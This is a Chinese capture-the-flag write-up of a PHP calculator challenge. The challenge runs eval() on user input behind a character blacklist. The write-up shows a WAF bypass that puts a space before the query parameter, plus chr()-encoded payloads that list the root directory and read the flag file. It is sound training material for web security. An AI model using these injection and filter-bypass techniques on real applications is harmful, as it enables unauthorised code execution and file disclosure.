试了一下,数字可以计算,但字符被过滤了,打开源码看看
源码里提示,有waf,并且发现了一个新页面
访问新页面
show_source()
show_source()函数用于将指定文件的源代码输出到浏览器或者写入到文件中。
show_source(__FILE__);用于显示当前文件的源代码。
show_source()函数只能显示PHP文件的源代码,不能显示其他类型的文件。另外,由于安全原因,该函数默认情况下只能显示本地文件的源代码,无法显示远程文件的源代码。
foreach()
foreach 语句用于循环遍历数组。
每进行一次循环,当前数组元素的值就会被赋值给后一个变量(数组指针会逐一地移动) - 以此类推。
preg_match()
preg_match 函数用于执行一个正则表达式匹配。(查找前面内容是否在后面存在)
die()
die()函数输出一条消息,并退出当前脚本。
该函数是 exit() 函数的别名。
网页源码解释
<?php
error_reporting(0);
if(!isset($_GET['num'])){//从用户获取输入,如果无
show_source(__FILE__);//显示当前页的源码
}else{
$str = $_GET['num'];//有,将其值赋给str
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];//定义一个列表
foreach ($blacklist as $blackitem) {//循环将blacklist的值赋给blackitem
if (preg_match('/' . $blackitem . '/m', $str)) {//判断str中是否包含'/' . $blackitem . '/m'中的任意一项
die("what are you want to do?");//是,输出what are you want to do?并退出
}
}
eval('echo '.$str.';');//否,输出str
}
?> 验证一下是否判断正确
这是被防火墙防了?
在?后加个空格试试
ps:
PHP将查询字符串(在URL或正文中)转换为内部$_GET或关联数组$_POST。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。
例如:
/?foo=bar变成Array([foo]=> “bar”)。
/? foo=bar变成Array([foo]=> “bar”)。 //?号后有一个空格
/?+foo=bar变成Array([foo]=> “bar”)。 //?号后有一个+号
()里出现空格等,上列被过滤的字符时,返回what are you want to do?
这样会限制system的使用
需要更换命令进行绕过,使用var_dump()和scandir()函数,找到了类似于flag的f1agg
? num=var_dump(scandir(chr(47)))相当于? num=system(ls /)。chr(47)=" / "
ps:
scandir()函数返回指定目录中的文件和目录的数组。scandir(/)相当于ls /var_dump()相当于echo
ps:
chr(ascii)码对照表大全-CSDN博客
http://node4.buuoj.cn:26361/calc.php?%20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
